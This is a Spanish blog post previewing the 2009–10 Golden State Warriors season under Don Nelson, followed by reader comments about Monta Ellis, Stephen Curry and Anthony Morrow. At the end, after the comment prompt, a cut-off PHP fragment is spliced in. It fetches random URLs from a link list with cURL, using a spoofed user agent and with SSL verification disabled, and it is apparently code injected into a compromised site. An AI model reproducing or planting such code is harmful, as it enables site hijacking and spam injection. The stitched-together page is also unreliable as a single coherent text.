Golden State Warriors: Las locuras de Don Nelson

04 de October de 2009 por Jose_Dantley

Analizar a los Warriors  no es sólo analizar a algunos de los jóvenes con más talento de la NBA, sino intentar un ejercicio inútil de psicoanálisis de la mente de su entrenador. Mientras otros entrenadores ganan templanza con los años, Don Nelson parece haber ido ganando en imprevisibilidad.  Ataques rapidísimos, desprecio habitual por dotar a la defensa de solidez, formaciones con cuatro bases o escoltas, son el pan nuestro de cada noche de baloncesto con los Warriors. Por supuesto que muchas veces esa anarquía crea partidos entretenidísimos, pero lo cierto es que salvo aquella gran temporada de hace un par de años en la que con 48 victorias quedaron fuera de los playoffs, el fracaso se ha asentado en la franquicia. La mejor noticia sería que la tan esperada venta al magnate de Oracle, Larry Ellison, se llevara a cabo pero de momento no son más que especulaciones.

Sin embargo, hay motivos para el optimismo. Nunca en la última década ha tenido Golden State un equipo tan atractivo en cuanto a potencial. A la esperada vuelta de Monta Ellis, se le unen unos esperadísimos años sophomore de Anthony Randolph y Anthony Morrow y un prometedor rookie, Stephen Curry. En el lado negativo, el mayor problema es la exigencia del capitán Stephen Jackson de ser traspasado. No es el mejor ambiente para fomentar el espíritu de equipo.

En el puesto de base, se espera que Monta Ellis después de su lesión muestre su impresionante capacidad para entrar a canasta y crear situaciones de ataque. Ellis no es un base puro, como tampoco lo es el rookie Stephen Curry, ni el tercero en discordia, C.J.Watson. De hecho, no sería extraño ver a Ellis y Curry juntos muchos minutos lo que conformaría probablemente la peor pareja defensiva de la liga, pero una de las potencialmente más creativas en ataque.

Para las posiciones de 2 y 3 –y hasta de 4 con los esquemas de Nelson- el abanico es grande e incierto. Stephen Jackson es un jugador de 20 puntos por partido sin el menor problema, pero no sabemos cuál será su papel ante la más que probable falta de ofertas serias para un traspaso. Si sigue teniendo los galones en el equipo, será su principal baluarte ofensivo junto con Ellis. Cory Maggette por su parte, parece destinado a continuar probando que su fichaje fue en error. Es más que probable que tanto Azubuike como Morrow le adelanten en la rotación. En el caso de Morrow, estamos ante uno de los tiradores más letales de la última década. Aporta en el rebote, pero ofrece dudas en defensa –poco importa en los Warriors- y en su carácter de jugador unidimensional.

La posición de power-forward parece que tiene dueño oficial. Tras incluso hablar con sus padres –cosas de Nelson- parece que al fin confía en que Anthony Randolph es el futuro de la franquicia. Randolph acaba de cumplir 20 años, pero las comparaciones parecen quedarse corta. El propio Odom lo vio como un clon suyo, aunque parece que la determinación y el techo de Randolph son superiores. Su enorme versatilidad para un casi 7 pies hacen de él probablemente la mayor esperanza para los seguidores californianos desde hace muchísimos años. Su eclosión ha eclipsado a Brandan Wright, que podría incluso tener que compartir minutos con el recién fichado Mikki Moore.

Para la posición de center, los Warriors disponen de una pareja muy estable, quizá lo único estable del equipo. Biedrins asegura rebote y defensa, Turiaf más defensa, energía y tapones.

Soñar con los playoffs no sería descabellado, pero los interrogantes son muchos más que las certezas y los partidos no sólo se ganan en ataque.

Quinteto inicial: Ellis-Jackson-Azubuike-Randolph-Biedrins

Sexto hombre: Morrow

Pronóstico: Entre el 9º y el 12º de la conferencia Oeste

Comenta

12 comentarios a esta entrada

  1. Dantley2 dice:
    #1

    Actualizo el análisis, cosa por otra parte normal tratándose de los Warriors de Nelson:

    – Ellis dice que jugando junto con Curry no van a ganar partido, más o menos ha venido a decir que lo que no puede ser no puede ser y además es imposible. Eso justo después de que Nelson dijera que iba a jugar con pequeños atrás.

    – Tras lo de Ellis, Nelson medio rectificó diciendo que Morrow también es bajito. O sea, puede ser que Morrow sea el 2.

    – Nelson ha asegurado que Jackson será el 3, Randolph 4 y Biedrins 5, con lo que contando a Ellis sólo nos queda la duda de si Curry (Ellis volvería a hablar seguro, Morrow, Azubuike o cualquier otro)

    – Randolph no es un casi 7 pies, oficialmente ya ha crecido hasta los 7 pies, no sabemos si con o sin zapatillas, pero ha ganado una pulgada desde hace un año.

    – Wright se ha lesionado de cierta gravedad en el hombre, entre 4 y 6 meses de baja. Había dudas de cómo buscarle minutos para que pudiera evolucionar, ahora desgraciadamente problema resuelto.

      Citar

  2. Héctor dice:
    #2

    De momento, ayer primer partido de pretemporada y titulares en el backcourt Ellis (aunque solo jugó 12 minutos) y Azubuike, con Curry y Morrow saliendo (y saliéndose) desde el banquillo.

    Vale que son ensayos y que no hay nada claro, pero puede ser un síntoma de por donde van a ir los tiros.

    Saludos.

      Citar

  3. Txusma dice:
    #3

    Microondas Morrow, pero se confirma q es plano, plano. El nuevo Ben Gordon?

      Citar

  4. TheDeerHunter dice:
    #4

    No comparto el enfoque que nuestro amigo Jose hace de la situación de los Warriors.
    “salvo aquella gran temporada de hace un par de años en la que con 48 victorias quedaron fuera de los playoffs, el fracaso se ha asentado en la franquicia” – dice.
    Yo digo todo lo contrario. Salvo la pasada campaña, cuando el “superestrella” alrededor de quien has diseñado tu equipo, al que le acabas de firmar un megacontrato que no se lo salta un galgo, te la juega, Nelson ha dirigido muy dignamente al equipo (y jugando de cine, por momentos)
    Si se dice que “los experimentos mejor con gaseosa” no había mejor momento para experimentar que el curso pasado, en el que, seamos serios, no se jugaban absolutamente nada. Vimos cosas rocambolescas, sí… pero también conocimos algún nuevo elemento que de no ser por Nelson no sabríamos ni que existía. Diría que Nelson ha corregido de un plumazo la cagada de Ellis y también la de quien le firmó el contrato.
    Si algo se le podría reprochar es la mala relación con Stephen Jackson, como también la que tuvo con Al Harrington, pero si algo precísamente nos ha enseñado el affer Ellis es que no te puedes fiar de la actitud caprichosa y egoísta de los jugadores para valorar absolutamente nada. Cada uno habrá defendido sus propios intereses (excepto Ellis, que es el único que tira piedras contra su tejado) Sería una lástima no poder contar con el 100% del capitán en esta plantilla tan interesante.

    Los errores más graves de la franquicia no son suyos, ni mucho menos. El primero, ya lo he comentado otras veces y no quiero ser pesado… pero es que ya es lo que me faltaba por oir, que Ellis (después de todas sus hazañas) se permita el lujo de opinar absolutamente nada sobre asuntos que sobrepasan de largo sus competencias. Alguien debería (volver a) llamarle al orden a ese chico… y digo que lo mejor que podrían hacer sería largarlo, porque ha demostrado que su cabeza no sirve para llegar a ningún buen puerto. Que disfruten otros ese contratito de 11 kilakos.
    El segundo, lo ha comentado muy bien Jose. Maggette siempre sobró y más por esa pasta… sólo tenía sentido como vendetta por lo de Davis. Muy mala política para un equipo humilde como son los Warriors.

    Por lo demás, me la juego a que van a dar guerra este año (aunque coincido con el pronóstico finalmente)

      Citar

  5. Txusma dice:
    #5

    Veo q tu animadversion por Monta sigue a flor de piel, eh?
    Monta ha dicho algo asi como “q no se puede jugar con dos bases-escoltas bajitos pq la liga esta llena de escoltas muy fuertes y poderosos fisicamente”. Ya me dirás si comentarios como este no los dicen día si y día también varios jugadores de la liga.

      Citar

  6. TheDeerHunter dice:
    #6

    No digo que no, pero particularmente él debería estar más calladito que nadie.

    A ver si, más que de los escoltas poderosos de lo que está él preocupado es de que se demuestre que por lo que pagan a Stephen Curry consiguen lo mismo o más que por sus 11 millones por temporada.
    Cuando tenía que jugar junto a Baron Davis no se quejaba tanto de ser un base-escolta bajito.

      Citar

  7. Viva_Dirk dice:
    #7

    Joer Txus, ¿Ben Gordon te parece un jugador plano?

    En el tema Ellis creo que Deer tiene razón en que tiene la boca muy grande para la que lió el año pasado, primero diciendo que si drafteaban un escolta pueden ir pensando en traspasarlo y luego esto. Creo que un traspaso con Chicago en el que les llegase Hinrich y algun complemento les vendria de perlas.

      Citar

  8. Txusma dice:
    #8

    Lo comparaba más bien el sentido de Microondas y como jugador capaz de salir y matar un partido. Ha de comer muchos petisuis todavia Morrow para parecerse a Gordon.

      Citar

  9. Dantley2 dice:
    #9

    Es que Morrow no tiene absolutamente nada que ver con Gordon, en nada, ni microondas ni nada. Morrow es una versión potencialmente superior a Steve Kerr porque puede aportar lo que Kerr aportaba, pero con más precisión (está por ver, pero lo de Morrow no es normal) y muy buena presencia en el rebote, que algo es algo. Luego le falta manejo de balón por un tubo, visión de juego, penetración a canasta y defensa, aunque en este apartado no es un agujero y estará al nivel de muchos tiradores de la liga porque actitud no le falta.

    Deer, la frase no está muy bien expresada. El fracaso se ha asentado en Warriors, no en Nelson. Nelson no es responsable de que se tiraran no sé si llegó a 12 temporadas o así sin ver playoffs, sólo lleva 3 y además en la anterior a la que cito y que debería haber nombrado, sí entraron en playoffs curiosamente con peor balance. Pero creo que una vez logrado eso, a Nelson se le ha ido la mano. Los dueños han cedido a poner a un nelsonista (ojo, que aunque no lo parezca, toda mi vida he sido nelsonista) de GM que básicamente ha hecho lo que Nelson ha pedido. Y por momentos, el año pasado se volvió loco, completamente. Parecía a veces más empeñado en demostrar su ojo con los D-Leaguers que en ganar partidos o desarrollar a los buenos. En Oakland el personal está muy cansado.

    Pero bueno, reconozco que me puede haber pesado la decepción de ser un nelsonista y ver cómo había cierta desintegración del equipo el año pasado.

    Tema Ellis. No sólo habló eso, también se permitió amenazar de que si drafteaban a un base, que fueran traspasándolo. Vamos a ver cómo acaba. Ayer ya admitió que puede ser compatible conn Curry, es un paso, pero si Curry sale bueno, o mejor dicho (porque bueno es seguro) si su talento es trasladable a tener impacto en la NBA, lo mejor sería traspasar a Ellis y sacar algo que cierre la plantilla. Eso sí, algunas de las cosas que da Ellis, no las da casi nadie en la liga.

      Citar

  10. Dantley2 dice:
    #10

    Ayer en el partido de preseason y simplemente leyendo crónicas y box score, y teniendo en cuenta que tampoco sirve para mucho esto, algunas cosas curiosas como ha comentado Héctor. Randolph de jefe pero pasado de revoluciones, 13 tiros en 10 minutos, así no Antoñito ¡¡¡ también 9 rebotes, 2 asistencias, 3 tapones, 7 tiros libres provocados. No sé si será indicativo de la temporada, pero parecía que el balón era suyo.

    Azubuike aportando en todo y Morrow impresionante nuevamente en el tiro, los que vieron el partido aún alucinan más de lo que ya estaban.Curry repartió 9 asistencias, a ver si resulta que al final es un base puro. Muy interesante, la verdad, tengo muchas ganas de verlos en la temporada.

      Citar

  11. Dantley2 dice:
    #11

    Rectifico, los minutajes están completamente mal, Ellis jugó 24, Curry los otros 24. Randolph jugó 23, eso ya es más normal con el número de tiros. Azubuike jugó 41.

      Citar

  12. Landrusski dice:
    #12

    Para mi un equipazo…pero que no va a llegar ni a playoffs ahi esta todo dixo XD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>